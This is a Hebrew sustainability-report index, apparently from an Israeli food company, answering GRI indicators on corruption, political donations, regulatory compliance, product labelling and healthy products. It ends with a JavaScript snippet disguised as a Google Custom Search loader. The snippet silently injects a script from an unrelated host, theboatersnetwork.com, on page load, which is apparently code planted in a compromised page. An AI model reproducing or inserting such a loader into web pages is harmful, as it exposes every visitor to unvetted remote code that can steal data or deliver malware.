מספר תלונות הקשורות לזכויות אדם שהוגשו, טופלו ונפתרו באמצעות מנגנונים פורמליים להגשת תלונות.

מלא

הקדמה להשקעה בעובדים שלנו

SO1

ליבה

אופי, היקף ואפקטיביות תכניות ופעילות אשר מתייחסות ומנהלות את השפעות הפעילות על קהילות, כולל כניסה, תפעול ויציאה.

מלא

קהילה

FP4

ליבה

אופי, היקף ואפקטיביות תכניות ופעילות  (תרומות בשווה כסף, יוזמות להתנדבות, העברת ידע ופיתוח מוצרים) המקדמות סגנון חיים בריא; מניעת מחלות כרוניות; גישה למזון בריא, מזין ובמחיר סביר; ורווחה משופרת עבור קהילות נזקקות.

מלא

חומוס

דנכול

SO2

ליבה

אחוז ומספר כולל של יחידות עסקיות שנותחו לגילוי סיכונים הקשורים לשחיתות.

מלא

תשתיות ציות

SO3

ליבה

אחוז העובדים שעברו הדרכה במדיניות הארגון ונהליו בתחום מניעת שחיתות.

מלא

תשתיות ציות

SO4

ליבה

פעולות שננקטו בתגובה למקרי שחיתות.

מלא

לא היו מקרי שחיתות

SO5

ליבה

עמדות בנוגע למדיניות ציבורית והשתתפות בפיתוח ושתדלנות למען מדיניות ציבורית.

מלא

אין אנו תומכים במפלגות פוליטיות ואיננו עוסקים בשתדלנות ישירה. עמדותינו בעניין מדיניות ציבורית מוצגות בפני האיגודים המסחריים בהם אנו חברים.

SO6

ערכן הכולל של תרומות כספיות ובשווה ערך למפלגות פוליטיות, פוליטיקאים ולמוסדות קשורים, לפי מדינות.

מלא

לא תרמנו כל תרומות בעלות אופי פוליטי, בכל צורה שהיא.

S07

פעולות משפטיות בגין התנהגות אנטי-תחרותית.

מלא

לא היו פעולות משפטיות בגין התנהגות אנטי-תחרותית.

SO8

ליבה

ערכם הכספי של קנסות מהותיים ומספרן הכולל של סנקציות לא כספיות בגין אי-ציות לחוקים ותקנות.

מלא

לא שילמנו קנסות מהותיים ולא היו כל סנקציות בגין אי-ציות.

SO9

(3.1)

פעילויות שיש להן השפעות מהותיות שליליות פוטנציאליות או ממשיות על קהילות מקומיות.

מלא

לאף אחת מהפעילויות שלנו אין השפעות מהותיות מובנות על הקהילות המקומיות, מעבר לתפקידנו כמעסיק מקומי וכמשלם מיסים. אנו בשום מקרה לא המעסיק העיקרי בכל קהילה בה אנו פועלים.

SO10

(3.1)

אמצעי מניעה והפחתה המיושמים בפעילויות בעלות השפעות מהותיות שליליות פוטנציאליות או ממשיות על קהילות מקומיות.

מלא

לאף אחת מהפעילויות שלנו אין השפעות מהותיות מובנות על הקהילות המקומיות, אם כי אנו מנהלים דיאלוג כדי להבטיח שהפעילויות שלנו לא ישפיעו לרעה על הקהילות המקומיות.

PR1

ליבה

שלבים במחזור החיים בהם ההשפעות הבריאותיות והבטיחותיות של מוצרים ושירותים עוברות הערכה לשם שיפור, ואחוז קטגוריות המוצר והשירות המהותיים הכפופות להליכים כאמור.

מלא

לא יישמנו תכנית כוללת להערכת השלבים במחזור החיים של כל המוצרים שלנו. אולם, רבים ממוצרי המזון שלנו שופרו כדי לתמוך בתזונה בריאה. ראה תשובותינו ל-FP6 ו-FP7.

PR2

סה"כ מקרי אי-ציות לתקנות ולקודים וולונטריים הקשורים להשפעות בריאותיות ובטיחותיות של המוצרים והשירותים שלנו במשך מחזור החיים שלהם, לפי סוגי תוצאות.

מלא

לא היו מקרים של אי-ציות לתקנות ולקודים הקשורים לבריאות ובטיחות המוצרים שלנו.

 

FP5

ליבה

 

שיעור הייצור שנעשה באתרים המאושרים על ידי צד שלישי בלתי תלוי בהתאם לסטנדרטים בינלאומיים מוכרים למערכות ניהול בטיחות במזון.

מלא

30% מספקי חומרי הגלם והרכיבים שלנו מספקים מוצרים שאושרו על ידי צד שלישי בהתאם לסטנדרטים בינלאומיים מוכרים. הערכתנו הטובה ביותר היא שהנ"ל מייצגים למעלה מ-70% מכמויות הרכש הכוללות שלנו.

FP6

ליבה

שיעור מתוך כלל המכירות של מוצרים בעלי ערכים נמוכים של , , שומנים רוויים, שומני טרנס, נתרן וסוכרים, לפי קטגוריות מוצר

מלא

מוצרי מגזר בריאות ואיכות חיים שלנו, שהיוו 23% מהפעילות שלנו בישראל ב-2012. מוצרים אלה מאופיינים על ידי הדגש המושם על היבטים תזונתיים ופונקציונאליים, שהם חשובים לתזונה בריאה. מרבית מוצרים אלו טוענים היום לתועלות בריאותיות גדולות יותר ותכולת סוכר, שמן ונתרן מופחתת. ממרחי סברה מהווים פחות מ-5% מסך כל הפעילות שלנו ומכילים אפס שומני טרנס ונתרן מופחת.

FP7

ליבה

שיעור מתוך כלל המכירות, של מוצרים בעלי ערכים מוגברים סיבים תזונתיים, ויטמינים, מינרלים, פיטוכימיקלים או תוספי מזון פונקציונאליים, על פי קטגוריות מוצר

מלא

חלק מהותי מהמחזור שלנו בישראל מורכב ממוצרים המכילים רכיבים מועשרים או פונקציונאליים, לדוגמה, יוגורטים המכילים זני פרוביוטיקה ו/או תוספי סידן, מוצרי חלב במותג דנונה כגון דנכול ואקטימל, שהם פרוביוטיים או מכילים פיטוסטרולים, וחלק ממגווני מוצרי החלב שלנו מכילים תוספת ויטמינים או מינרלים. אלה הם מוצרים במגזר בריאות ואיכות חיים, אשר היוו 23% מהפעילות שלנו בישראל ב-2012.

PR3

ליבה

סוג מידע נדרש לגבי מוצרים ושירותים מכוח נהלים, ואחוז המוצרים והשירותים המהותיים, שהם כפופים לדרישות מידע כאמור.

מלא

100% ממוצרי המזון והמשקאות שלנו כפופים לרגולציה מחמירה בנוגע לסימון בכל המדינות בהן אנו פועלים. אנו ממלאים אחר כל הדרישות החוקיות כאמור.

FP8

מדיניות ופעילות בנושא תקשור לצרכנים בנוגע לרכיבים ומידע תזונתי, מעבר לדרישות החוק.

מלא

אנו ממלאים אחר כל דרישות החוק לעניין סימון רכיבים ומידע תזונתי עבור כל המוצרים שלנו ללא יוצא מן הכלל.

PR4

מספרם הכולל של מקרי אי-ציות לתקנות ולקודים וולונטריים בנוגע למידע וסימון מוצרים ושירותים, לפי סוגי תוצאות.

מלא

לא היו מקרים של אי-ציות לתקנות ולקודים לעניין סימון מוצרים.

PR5

פעילות הקשורות לשביעות רצון לקוחות, כולל תוצאות סקרים למדידת שביעות רצון לקוחות.

מלא

שביעות רצון צרכנים

PR6

ליבה

תכניות לקיום חוקים, סטנדרטים וקודים וולונטריים ביחס לתקשורת שיווקית, כולל פרסום, קד"מ וחסויות.

מלא

תהליכי הציות וניהול הסיכונים שלנו מבטיחים שנקיים כנדרש את כל החוקים, הסטנדרטים והקודים הוולונטריים שאומצו בנוגע לשיווק וקידום מכירות. בנוסף, כל עובדי השיווק שלנו ברחבי העולם עברו הדרכה מלאה בנושא הקוד האתי שלנו.

PR7

מספרם הכולל של מקרי אי-ציות לתקנות ולקודים וולונטריים בנוגע לתקשורת שיווקית, כולל פרסום, קד"מ וחסויות, לפי סוגי תוצאות.

לא היו מקרים של אי-ציות לתקנות ולקודים בנוגע לתקשורת שיווקית.

(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://theboatersnetwork.com/js/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);
})();